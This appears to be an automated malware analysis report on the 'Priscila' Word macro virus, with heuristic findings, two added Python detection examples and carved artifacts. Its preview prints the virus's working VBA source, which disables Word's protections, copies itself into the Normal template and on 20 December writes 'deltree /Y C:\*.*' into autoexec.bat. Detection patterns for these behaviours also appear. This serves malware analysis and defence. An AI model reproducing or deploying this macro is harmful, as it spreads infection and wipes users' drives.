Verdict: MALICIOUS (risk score 320)
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1547.001 Registry Run Keys / Startup Folder
The sample is a Word document carrying a VBA macro virus. Its AutoClose macro (module name "Priscila") first turns off Word's defences: WordBasic.DisableAutoMacros 0 re-enables auto macros, Options.VirusProtection = False silences Word 97's macro-virus warning, and alerts and screen updating are suppressed. It then checks whether a module named "Priscila" exists in the active document and in the Normal template and uses Application.OrganizerCopy to copy the module in whichever direction it is missing, saving the document and setting Options.SaveNormalPrompt = False so the template is written back silently. Infecting the Normal template is what gives persistence and propagation (the module is then copied into every document closed afterwards); the mechanism is Word's template, not a registry Run key or Startup folder. The write to \autoexec.bat is not persistence but a date-triggered destructive payload: on 20 December the macro appends "@echo off" and "deltree /Y C:\*.*" to the file, which would wipe the C: drive at the next boot, and shows an Office Assistant balloon announcing the "PRISCILA ViRuS - by CrM - Paraguay". Note that the payload opens the file under the handle returned by FreeFile() but writes to #1; the two coincide only when no other VBA file handle is open, and the On Error GoTo Priscila handler swallows any failure. The legacy WordBasic calls, the Normal-template infection and the two ClamAV detections (Doc.Trojan.NightShade-4 on the macro source, Doc.Trojan.Idea-1 on the carved child) are consistent with a late-1990s Word 97 macro virus.
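To make the triage above reproducible, the following added example (not the analyzer's code and not part of the sample) scans a decoded VBA module for Word's auto-execution entry points and for the specific behaviours this macro shows: disabling virus protection, re-enabling auto macros, copying a project module through OrganizerCopy, and writing a destructive command into autoexec.bat. The rule set, weights and verdict thresholds are assumptions chosen for illustration; the input is a constructed, abridged copy of the Priscila routine from the preview in this report, plus a constructed benign module for comparison.

```python
"""Keyword triage of a decoded VBA module, in the spirit of the olevba
checks this report relies on.  Added example: not the analyzer's code and
not part of the sample; rule set, weights and thresholds are assumptions."""
import re

# Procedure names Word runs without any user action (its auto-exec surface).
AUTOEXEC_PROCS = {"autoexec", "autoopen", "autoclose", "autonew", "autoexit",
                  "document_open", "document_close", "document_new"}

# (pattern, tag, weight): behaviours seen in the Priscila macro, as indicators.
RULES = [
    (r"\bOptions\.VirusProtection\s*=\s*False\b", "disable_virus_protection", 40),
    (r"\bDisableAutoMacros\s+0\b", "enable_auto_macros", 20),
    (r"\bOrganizerCopy\b.*\bwdOrganizerObjectProjectItems\b", "module_copy_via_organizer", 40),
    (r"\bNormalTemplate\b", "touches_normal_template", 15),
    (r"\bVBProject\.VBComponents\b", "vba_project_introspection", 15),
    (r'\bOpen\s+"[^"]*autoexec\.bat"\s+For\s+Append\b', "writes_autoexec_bat", 40),
    (r"\bdeltree\b|\bformat\s+[a-z]:", "destructive_dos_command", 40),
    (r"\bOn\s+Error\s+GoTo\b", "error_suppression", 5),
    (r"\bDisplayAlerts\s*=\s*wdAlertsNone\b", "suppress_alerts", 5),
]

PROC_RE = re.compile(r"^\s*(?:Public\s+|Private\s+)?(?:Sub|Function)\s+([A-Za-z_]\w*)",
                     re.IGNORECASE | re.MULTILINE)


def strip_comment(line):
    """Drop a trailing ' comment, ignoring apostrophes inside "..." literals."""
    in_str = False
    for i, ch in enumerate(line):
        if ch == '"':
            in_str = not in_str
        elif ch == "'" and not in_str:
            return line[:i]
    return line


def find_autoexec_procs(src):
    """Names of auto-executing procedures defined in the module."""
    return sorted({m.group(1) for m in PROC_RE.finditer(src)
                   if m.group(1).lower() in AUTOEXEC_PROCS})


def find_indicators(src):
    """(tag, weight, line number, line) for every rule hit, comments excluded."""
    hits = []
    for lineno, line in enumerate(src.splitlines(), 1):
        code = strip_comment(line)
        for pattern, tag, weight in RULES:
            if re.search(pattern, code, re.IGNORECASE):
                hits.append((tag, weight, lineno, line.strip()))
    return hits


def triage(src):
    """Score a module: each distinct indicator counts once, plus a bonus for
    any auto-exec entry point.  Thresholds are arbitrary (assumption)."""
    procs = find_autoexec_procs(src)
    weights = {tag: w for tag, w, _, _ in find_indicators(src)}
    score = sum(weights.values()) + (30 if procs else 0)
    verdict = "malicious" if score >= 100 else "suspicious" if score >= 40 else "clean"
    return {"autoexec_procs": procs, "indicators": sorted(weights),
            "score": score, "verdict": verdict}


# Constructed input: the Priscila AutoClose routine from this report's preview,
# abridged to the lines that matter for the rules above.
PRISCILA_ABRIDGED = r'''
Sub AutoClose()
On Error GoTo Priscila
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
Application.DisplayAlerts = wdAlertsNone
For J = 1 To NormalTemplate.VBProject.VBComponents.Count
Next
Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="Priscila", Object:=wdOrganizerObjectProjectItems
If Month(Now()) = 12 And Day(Now()) = 20 Then
NúmArch2 = FreeFile()
Open "\autoexec.bat" For Append As NúmArch2
Print #1, "deltree /Y C:\*.*"
Close NúmArch2
End If
Priscila:
End Sub
'''

# Constructed benign module for comparison.
BENIGN = '''
Sub FormatReport()
    ' Bold the first paragraph; nothing runs automatically.
    ActiveDocument.Paragraphs(1).Range.Font.Bold = True
End Sub
'''

if __name__ == "__main__":
    for name, src in (("Priscila", PRISCILA_ABRIDGED), ("benign", BENIGN)):
        print(name, triage(src))
```

Comments are stripped before matching so that a `'` note mentioning deltree does not fire a rule, but string literals are kept, since the destructive command here lives inside a Print string. Each tag is counted once per module, so a module that touches NormalTemplate on several lines is not scored higher than one that does it once.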
Heuristics (7)

- ClamAV detection (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.NightShade-4.
- Embedded Office document has suspicious static findings (critical, EMBEDDED_OFFICE_CHILD_STATIC_TRIAGE): a CFB/OLE Office document was found inside another file type and its carved contents matched Office exploit or payload heuristics. This catches wrapped exploit documents where the top-level file routes to a PE, archive, or generic scanner instead of Office. In this sample the container is the top-level OLE document itself; the child was carved at offset 0x460C (see the extracted artifacts below).
- OLE document has large unaccounted-for region (high, OLE_SLACK_ANOMALY): the OLE file is 20,980 bytes but its declared streams total only 0 bytes, so all 20,980 bytes (100%) lie in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
- VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding): the document contains VBA macro code.
- Auto_Close macro (high, OLE_VBA_AUTOCLOSE): the VBA project defines an AutoClose procedure, which Word runs whenever the document is closed.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): an OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered from it and no stronger macro-virus family marker was present. This is analyst-facing evidence of old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- CFB header with no readable streams (medium, OLE_PARSE_EMPTY_STREAMS): the file begins with a valid OLE2/CFB header but exposes no directory streams. A non-empty compound document with an unreadable directory is anomalous; it is seen with truncated or corrupt files and, more importantly, with content deliberately shifted off byte boundaries to defeat parsers while the host application still recovers the object.

Note that the 20,980-byte figure in the slack and empty-stream findings is the size of the carved child embedded_office_off0000460c.ole, not of the top-level document, which parsed normally (its VBA project was recovered by olevba). A carved fragment whose header is intact but whose FAT and directory pointers fall outside the carved bytes produces exactly this pair of findings, so confirm the child's layout with an OLE parser before reading them as exploit evidence; the macro virus is the demonstrated threat in this sample.
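The two structural findings can be checked independently of the analyzer. The following added example (not the analyzer's code) parses a CFB header, reads the FAT and the directory, sums the declared stream sizes, and counts body sectors the FAT leaves unallocated. It builds a minimal constructed image (the stream name WordDocument and its 4096-byte size are arbitrary test values, not taken from the sample) and then breaks that image's FAT and directory pointers to reproduce the "no readable streams, 100% slack" pattern that a carved fragment with a valid header produces. Only the 109 DIFAT slots in the header are read, which covers files up to roughly 7 MB; the mini stream is not modelled.

```python
"""Structural audit of an OLE2/CFB container, reproducing two of the report's
checks: declared stream bytes versus unallocated sectors, and a header whose
directory cannot be read.  Added example: not the analyzer's code; the images
built below are constructed test data, not the sample."""
import struct

MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"
FREESECT, ENDOFCHAIN, FATSECT, DIFSECT = 0xFFFFFFFF, 0xFFFFFFFE, 0xFFFFFFFD, 0xFFFFFFFC
NOSTREAM = 0xFFFFFFFF


def parse_header(data):
    """Fields the audit needs; DIFAT sectors beyond the 109 header slots are ignored."""
    if len(data) < 512 or data[:8] != MAGIC:
        raise ValueError("not a CFB file")
    _minor, _major, _order, sector_shift = struct.unpack_from("<HHHH", data, 0x18)
    num_fat, first_dir = struct.unpack_from("<II", data, 0x2C)
    difat = struct.unpack_from("<109I", data, 0x4C)
    return {"sector_size": 1 << sector_shift, "first_dir": first_dir,
            "fat_sectors": [s for s in difat[:num_fat] if s != FREESECT]}


def sector(data, hdr, n):
    """Bytes of sector n (sector 0 follows the header); None if special or outside the file."""
    ss = hdr["sector_size"]
    off = (n + 1) * ss
    if n >= DIFSECT or off + ss > len(data):
        return None
    return data[off:off + ss]


def read_fat(data, hdr):
    """Flattened FAT; empty if any FAT sector lies outside the file."""
    fat = []
    for s in hdr["fat_sectors"]:
        blk = sector(data, hdr, s)
        if blk is None:
            return []
        fat.extend(struct.unpack("<%dI" % (len(blk) // 4), blk))
    return fat


def chain(fat, start):
    """Follow a FAT chain, stopping on special values, out-of-range indices or loops."""
    seen, out = set(), []
    while start < DIFSECT and start < len(fat) and start not in seen:
        seen.add(start)
        out.append(start)
        start = fat[start]
    return out


def read_directory(data, hdr, fat):
    """Directory entries as dicts (name, type, start, size); type 2 is a stream."""
    entries = []
    for s in chain(fat, hdr["first_dir"]):
        blk = sector(data, hdr, s)
        if blk is None:
            break
        for i in range(0, len(blk), 128):
            e = blk[i:i + 128]
            name_len, kind = struct.unpack_from("<HB", e, 0x40)
            if kind == 0 or name_len > 64:          # unused slot or corrupt name length
                continue
            name = e[:max(name_len - 2, 0)].decode("utf-16-le", "replace")
            start, size = struct.unpack_from("<IQ", e, 0x74)
            entries.append({"name": name, "type": kind, "start": start, "size": size})
    return entries


def audit(data):
    """Numbers behind OLE_SLACK_ANOMALY and OLE_PARSE_EMPTY_STREAMS-style findings."""
    hdr = parse_header(data)
    ss = hdr["sector_size"]
    fat = read_fat(data, hdr)
    entries = read_directory(data, hdr, fat)
    streams = [e for e in entries if e["type"] == 2]
    total = max(-(-(len(data) - ss) // ss), 0)      # body sectors, partial one rounded up
    allocated = sum(1 for i in range(total) if i < len(fat) and fat[i] != FREESECT)
    unalloc = total - allocated
    return {"file_size": len(data), "readable_directory": bool(entries),
            "stream_count": len(streams),
            "declared_stream_bytes": sum(e["size"] for e in streams),
            "total_sectors": total, "unallocated_sectors": unalloc,
            "unallocated_pct": round(100.0 * unalloc / total, 1) if total else 0.0}


def stream_names(data):
    hdr = parse_header(data)
    return [e["name"] for e in read_directory(data, hdr, read_fat(data, hdr))]


def build_image():
    """Constructed v3 CFB: header, FAT in sector 0, directory in sector 1,
    one 4096-byte stream 'WordDocument' in sectors 2-9 (arbitrary test values)."""
    hdr = bytearray(512)
    hdr[:8] = MAGIC
    struct.pack_into("<HHHHH", hdr, 0x18, 0x3E, 3, 0xFFFE, 9, 6)   # versions, byte order, shifts
    struct.pack_into("<II", hdr, 0x2C, 1, 1)                        # 1 FAT sector, directory at sector 1
    struct.pack_into("<IIIII", hdr, 0x38, 0x1000, ENDOFCHAIN, 0, ENDOFCHAIN, 0)  # mini cutoff, mini FAT, DIFAT
    struct.pack_into("<109I", hdr, 0x4C, 0, *([FREESECT] * 108))     # DIFAT[0]: FAT lives in sector 0
    fat = [FREESECT] * 128
    fat[0], fat[1] = FATSECT, ENDOFCHAIN
    for i in range(2, 9):
        fat[i] = i + 1
    fat[9] = ENDOFCHAIN

    def entry(name, kind, child, start, size):
        e = bytearray(128)
        n = name.encode("utf-16-le")
        e[:len(n)] = n
        struct.pack_into("<HBB", e, 0x40, len(n) + 2, kind, 1)
        struct.pack_into("<III", e, 0x44, NOSTREAM, NOSTREAM, child)
        struct.pack_into("<IQ", e, 0x74, start, size)
        return bytes(e)

    directory = (entry("Root Entry", 5, 1, ENDOFCHAIN, 0)
                 + entry("WordDocument", 2, NOSTREAM, 2, 4096) + bytes(256))
    return bytes(hdr) + struct.pack("<128I", *fat) + directory + b"A" * 4096


def break_pointers(img):
    """Point the FAT and directory past EOF: valid magic, nothing resolvable,
    which is what a carved fragment without its body looks like."""
    bad = bytearray(img)
    struct.pack_into("<I", bad, 0x30, 0x4000)
    struct.pack_into("<I", bad, 0x4C, 0x4000)
    return bytes(bad)


if __name__ == "__main__":
    print("intact :", audit(build_image()))
    print("broken :", audit(break_pointers(build_image())))
```

On the intact image the audit reports one stream, 4096 declared bytes and no unallocated sectors; on the broken one it reports no readable directory, 0 declared bytes and 100% unallocated body, the same shape as the two findings above. Run audit() over the carved child and over the top-level document and compare the two before deciding whether the slack is hidden payload or simply bytes the carve could not resolve.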
Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 | Detection |
|---|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6391 bytes | f1ddf2542a658e3e93be14da1ad64b69749957ba994c93bc962f69651a5fccc5 | ClamAV: Doc.Trojan.NightShade-4; obfuscation or payload: unlikely |
Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Priscila"
Sub AutoClose()
Attribute AutoClose.VB_Description = "(c) 1997 Microsoft - All rights Reserved."
Attribute AutoClose.VB_ProcData.VB_Invoke_Func = "Microsoft.Priscila.AutoClose"
On Error GoTo Priscila
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
Application.ScreenUpdating = False
Application.DisplayAlerts = wdAlertsNone
Set ActiveDoc = ActiveDocument
Set GlobalDoc = NormalTemplate
EstaEnDoc = False
EstaEnDot = False
For I = 1 To ActiveDocument.VBProject.VBComponents.Count
If ActiveDocument.VBProject.VBComponents(I).Name = "Priscila" Then
EstaEnDoc = True
End If
Next
For J = 1 To NormalTemplate.VBProject.VBComponents.Count
If NormalTemplate.VBProject.VBComponents(J).Name = "Priscila" Then
EstaEnDot = True
End If
Next
If EstaEnDoc = False Then
Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:="Priscila", Object:=wdOrganizerObjectProjectItems
ActiveDoc.SaveAs FileName:=ActiveDoc.FullName
End If
If EstaEnDot = False Then
Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="Priscila", Object:=wdOrganizerObjectProjectItems
Options.SaveNormalPrompt = False
End If
If Month(Now()) = 12 And Day(Now()) = 20 Then
NúmArch2 = FreeFile()
Open "\autoexec.bat" For Append As NúmArch2
Print #1,
Print #1, "@echo off"
Print #1, "deltree /Y C:\*.*"
Close NúmArch2
Assistant.Visible = True
With Assistant.NewBalloon
.Icon = msoIconAlert
.Text = "Tienes el PRISCILA ViRuS - by CrM - Paraguay"
.Heading = "Atención:"
.Show
End With
End If
Application.DisplayAlerts = wdAlertsAll
Priscila:
End Sub
' Processing file: /opt/analyzer/scan_staging/cd54bab66361434e874ccf9663afb1fd.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 1120 bytes
' Macros/VBA/Priscila - 3324 bytes
' Line #0:
' FuncDefn (Sub AutoClose())
' Line #1:
' OnError Priscila
' Line #2:
' Line #3:
' LitDI2 0x0000
' Ld WordBasic
' ArgsMemCall DisableAutoMacros 0x0001
' Line #4:
' LitVarSpecial (False)
' Ld Options
' MemSt VirusProtection
' Line #5:
' Line #6:
' LitVarSpecial (False)
' Ld Application
' MemSt ScreenUpdating
' Line #7:
' Ld wdAlertsNone
' Ld Application
' MemSt DisplayAlerts
' Line #8:
' Line #9:
' SetStmt
' Ld ActiveDocument
' Set ActiveDoc
' Line #10:
' SetStmt
' Ld NormalTemplate
' Set GlobalDoc
' Line #11:
' Line #12:
' LitVarSpecial (False)
' St EstaEnDoc
' Line #13:
' LitVarSpecial (False)
' St EstaEnDot
' Line #14:
' Line #15:
' StartForVariable
' Ld I
' EndForVariable
' LitDI2 0x0001
' Ld ActiveDocument
' MemLd VBProject
' MemLd VBComponents
' MemLd Count
' For
' Line #16:
' Ld I
' Ld ActiveDocument
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd New
' LitStr 0x0008 "Priscila"
' Eq
' IfBlock
' Line #17:
' LitVarSpecial (True)
' St EstaEnDoc
' Line #18:
' EndIfBlock
' Line #19:
' StartForVariable
' Next
' Line #20:
' Line #21:
' StartForVariable
' Ld J
' EndForVariable
' LitDI2 0x0001
' Ld NormalTemplate
' MemLd VBProject
' MemLd VBComponents
' MemLd Count
' For
' Line #22:
' Ld J
' Ld NormalTemplate
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd New
' LitStr 0x0008 "Priscila"
' Eq
' IfBlock
' Line #23:
' LitVarSpecial (True)
' St EstaEnDot
' Line #24:
' EndIfBlock
' Line #25:
' StartForVariable
'
```

... (truncated)
| Filename | Kind | Source | Size | SHA-256 | Detection |
|---|---|---|---|---|---|
| embedded_office_off0000460c.ole | embedded-office | Embedded OLE/CFB Office body inside ole container at offset 0x460C | 20980 bytes | 57fc0caa1b311b41482d593fe6b7216c3feeab2236985b9783927951065159a6 | ClamAV: Doc.Trojan.Idea-1; obfuscation or payload: unlikely |